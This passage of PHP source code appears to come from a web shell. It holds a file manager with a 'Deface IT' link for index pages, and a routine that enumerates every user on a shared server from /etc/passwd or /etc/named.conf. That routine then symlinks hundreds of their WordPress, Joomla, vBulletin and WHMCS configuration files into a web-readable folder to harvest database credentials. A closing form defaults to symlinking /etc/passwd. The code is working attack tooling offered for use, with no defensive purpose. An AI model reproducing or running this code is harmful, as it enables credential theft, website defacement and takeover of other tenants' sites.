1029 <td class='info'><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator . $val); ?></a></td>
1030 <?php if($os != 'Windows')
1031 {
1032 echo "<td align=center><font size=2>";
1033 echo getOGid($val)."</font></td>";
1034 } ?>
1035 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
1036 <td class="info"><a href=javascript:void(0) onClick="fileaction('rename','<?php echo $vv; ?>')"><font size=2>Rename</font></a></td>
1037 <td></td>
1038 <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
1039 </tr></font>
1040 <?php
1041 }
1042 else if(is_file($vv))
1043 {
1044 ?>
1045 <tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'">
1046 <td class='file'><a href=javascript:void(0) onClick="fileaction('open','<?php echo $vv; ?>')"><?php if(("/" .$val == $_SERVER["SCRIPT_NAME"]) || ($val == "index.php") || ($val == "index.html") || ($val == "config.php") || ($val == "wp-config.php")) { echo "<font color=red>". $val . "</font>"; } else { echo $val; } ?></a> <?php if($val == "index.php" || $val == "index.html") { if(strlen($ind) != 0) { echo "<a href=javascript:void(0) onClick=\"defacefun('$vv')\"><font color=red>( Deface IT )</font></a>"; } } ?></td>
1047
1048 <td class='info'><font size=2><?php echo HumanReadableFilesize(filesize($dir . $directorysperator . $val));?></font></td>
1049
1050 <td class='info'><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator . $val); ?></a></td>
1051
1052 <?php if($os != 'Windows')
1053 {
1054 echo "<td align=center><font size=2>";
1055 echo getOGid($val)."</font></td>";
1056 } ?>
1057 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
1058
1059 <td class="info"><a href=javascript:void(0) onClick="fileaction('rename','<?php echo $vv; ?>')"><font size=2>Rename</font></a></td>
1060 <td class="info"><a href="<?php echo $self;?>?download=<?php echo $dir . $directorysperator .$val;?>"><font size=2>Download</font></a>
1061 <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
1062 </tr>
1063 <p>
1064 <?php
1065 }
1066 }
1067
1068 echo "</table>
1069<div align='right' style='width:100%;' id=maindiv><BR><label><input type='checkbox' name='checkall' onclick='checkedAll();'> <font class=txt size=3>Check All </font></label>
1070<select class=sbox name=choice style='width: 100px;'>
1071 <option value=delete>Delete</option>
1072 <option value=chmod>Change mode</option>
1073 if(class_exists('ZipArchive'))
1074 { <option value=compre>Compress</option>
1075 <option value=uncompre>Uncompress</option> }
1076 </select>
1077
1078 <input type=button onClick=\"myaction(choice.value)\" value=Submit name=checkoption class=but></form></div>";
1079 }}
1080 else
1081 {
1082 echo "<p><font size=3>".$_GET['dir']." is <b>NOT</b> a Valid Directory!<br /></font></p>";
1083 }
1084
1085}
1086if(isset($_REQUEST["script"]))
1087{
1088 $getpath = trim(dirname($_SERVER['SCRIPT_NAME']) . PHP_EOL);
1089 ?>
1090 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('manuallyscript')"><font class=txt size="4">| Do It Manually |</font></a></td>
1091 <td><a href=javascript:void(0) onClick="getdata('scriptlocator')"><font class=txt size="4">| Do It Automatically |</font></a></td>
1092 </tr></table></center>
1093 <?php
1094}
1095else if(isset($_REQUEST['manuallyscript']))
1096{
1097 ?>
1098 <center>
1099 <form action="<?php echo $self; ?>" method="post">
1100 <textarea class="box" rows="16" cols="100" name="passwd"></textarea><br>
1101 <input type="button" OnClick="manuallyscriptfn(passwd.value)" value="Get Config" class="but">
1102 </form>
1103 </center>
1104 <?php
1105}
1106else if(isset($_REQUEST['scriptlocator']))
1107{
1108 if(stristr(php_uname(),"Linux"))
1109 {
1110 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
1111 $path=explode('/',$url);
1112 $url =str_replace($path[count($path)-1],'',$url);
1113 function syml($usern,$pdomain)
1114 {
1115 symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1116 symlink('/home/'.$usern.'/public_html/core/includes/config.php',$pdomain.'~~vBulletin5.txt');
1117 symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1118 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1119 symlink('/home/'.$usern.'/public_html/vb/core/includes/config.php',$pdomain.'~~vBulletin5.txt');
1120 symlink('/home/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
1121 symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1122 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1123 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb1.txt');
1124 symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1125 symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1126 symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1127 symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1128 symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1129 symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1130 symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1131 symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1132 symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1133 symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1134 symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1135 symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1136 symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1137 symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1138 symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1139 symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1140 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1141 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1142 symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1143 symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1144 symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1145 symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1146 symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1147 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1148 symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1149 symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1150 symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1151 symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1152 symlink('/home2/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
1153 symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1154 symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1155 symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb2.txt');
1156 symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1157 symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1158 symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1159 symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1160 symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1161 symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1162 symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1163 symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1164 symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1165 symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1166 symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1167 symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1168 symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1169 symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1170 symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1171 symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1172 symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1173 symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1174 symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1175 symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1176 symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1177 symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1178 symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1179 symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1180 symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1181 symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1182 symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1183 symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1184 symlink('/home3/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
1185 symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1186 symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1187 symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb3.txt');
1188 symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1189 symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1190 symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1191 symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1192 symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1193 symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1194 symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1195 symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1196 symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1197 symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1198 symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1199 symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1200 symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1201 symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1202 symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1203 symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1204 symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1205 symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1206 symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1207 symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1208 symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1209 symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1210 symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1211 symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1212 symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1213 symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1214 symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1215 symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1216 symlink('/home4/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
1217 symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1218 symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1219 symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb4.txt');
1220 symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1221 symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1222 symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1223 symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1224 symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1225 symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1226 symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1227 symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1228 symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1229 symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1230 symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1231 symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1232 symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1233 symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1234 symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1235 symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1236 symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1237 symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1238 symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1239 symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1240 symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1241 symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1242 symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1243 symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1244 symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1245 symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1246 symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1247 symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1248 symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1249 symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1250 symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb5.txt');
1251 symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1252 symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1253 symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1254 symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1255 symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1256 symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1257 symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1258 symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1259 symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1260 symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1261 symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1262 symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1263 symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1264 symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1265 symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1266 symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1267 symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1268 symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1269 symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1270 symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1271 symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1272 symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1273 symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1274 symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1275 symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1276 symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1277 symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1278 symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1279 symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1280 symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1281 symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1282 symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1283 symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1284 symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1285 symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1286 symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1287 symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1288 symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1289 symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1290 symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1291 symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1292 symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1293 symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1294 symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1295 symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1296 symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1297 symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1298 symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1299 symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1300 symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1301 symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1302 symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1303 symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1304 symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1305 symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1306 symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1307 symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1308 symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1309 symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1310 symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1311 symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb7.txt');
1312 symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1313 symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1314 symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1315 symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1316 symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1317 symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1318 symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1319 symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1320 symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1321 symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1322 symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1323 symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1324 symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1325 symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1326 symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1327 symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1328 symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1329 symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1330 symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1331 symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1332 symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1333 symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1334 symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1335 symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1336 }
1337 if(isset($_REQUEST['passwd']))
1338 {
1339 $getetc = trim($_REQUEST['passwd']);
1340
1341 mkdir("dhanushSPT");
1342 chdir("dhanushSPT");
1343
1344 $myfile = fopen("test.txt","w");
1345 fputs($myfile,$getetc);
1346 fclose($myfile);
1347
1348 $file = fopen("test.txt", "r") or exit("Unable to open file!");
1349 while(!feof($file))
1350 {
1351 $s = fgets($file);
1352 $matches = array();
1353 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1354 $matches = str_replace("home/","",$matches[1]);
1355 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1356 continue;
1357 syml($matches,$matches);
1358 }
1359 fclose($file);
1360 unlink("test.txt");
1361 echo "<center><font class=txt size=3>[ Done ]</font></center>";
1362 echo "<br><center><a href=".$url."dhanushSPT target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
1363
1364 }
1365 else
1366 {
1367 $d0mains = @file("/etc/named.conf");
1368 if($d0mains)
1369 {
1370 mkdir("dhanushST");
1371 chdir("dhanushST");
1372
1373 foreach($d0mains as $d0main)
1374 {
1375 if(eregi("zone",$d0main))
1376 {
1377 preg_match_all('#zone "(.*)"#', $d0main, $domains);
1378 flush();
1379
1380 if(strlen(trim($domains[1][0])) > 2)
1381 {
1382 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1383
1384 syml($user['name'],$domains[1][0]);
1385 }
1386 }
1387 }
1388 echo "<center><font class=txt size=3>[ Done ]</font></center>";
1389 echo "<br><center><a href=".$url."dhanushST target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
1390 }
1391 else
1392 {
1393 mkdir("dhanushSPT");
1394 chdir("dhanushSPT");
1395 $temp = "";
1396 $val1 = 0;
1397 $val2 = 1000;
1398 for(;$val1 <= $val2;$val1++)
1399 {
1400 $uid = @posix_getpwuid($val1);
1401 if ($uid)
1402 $temp .= join(':',$uid)."\n";
1403 }
1404 echo '<br/>';
1405 $temp = trim($temp);
1406
1407 $file5 = fopen("test.txt","w");
1408 fputs($file5,$temp);
1409 fclose($file5);
1410
1411
1412 $file = fopen("test.txt", "r") or exit("Unable to open file!");
1413 while(!feof($file))
1414 {
1415 $s = fgets($file);
1416 $matches = array();
1417 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1418 $matches = str_replace("home/","",$matches[1]);
1419 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1420 continue;
1421 syml($matches,$matches);
1422 }
1423 fclose($file);
1424 echo "</table>";
1425 unlink("test.txt");
1426 echo "<center><font class=txt size=3>[ Done ]</font></center>";
1427 echo "<br><center><a href=".$url."dhanushSPT target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
1428 }
1429 }
1430 }
1431 else
1432 echo "<center>Cannot Complete the task!!!!</center>";
1433
1434}
1435else if(isset($_GET["symlinkfile"]))
1436{
1437 if(!isset($_GET['file']))
1438 {
1439 ?>
1440 <center>
1441 <form onSubmit="getdata('symlinkmyfile',file.value);return false;">
1442 <input type="text" class="box" name="file" size="50" value="/etc/passwd">
1443 <input type="button" value="Create Symlink" onClick="getdata('symlinkmyfile',file.value)" class="but">
1444 </form></center>
1445 <br><br>
1446 <?php
1447 }
1448}
1449
1450else if(isset($_GET['symlinkmyfile']))
1451{
1452 if(stristr(php_uname(),"Linux"))
1453 {
1454 $fakedir="cx";
1455 $fakedep=16;
1456
1457 $num=0; // offset of symlink.$num
1458
1459 if(!empty($_GET['myfile']))
1460 $file=$_GET['myfile'];
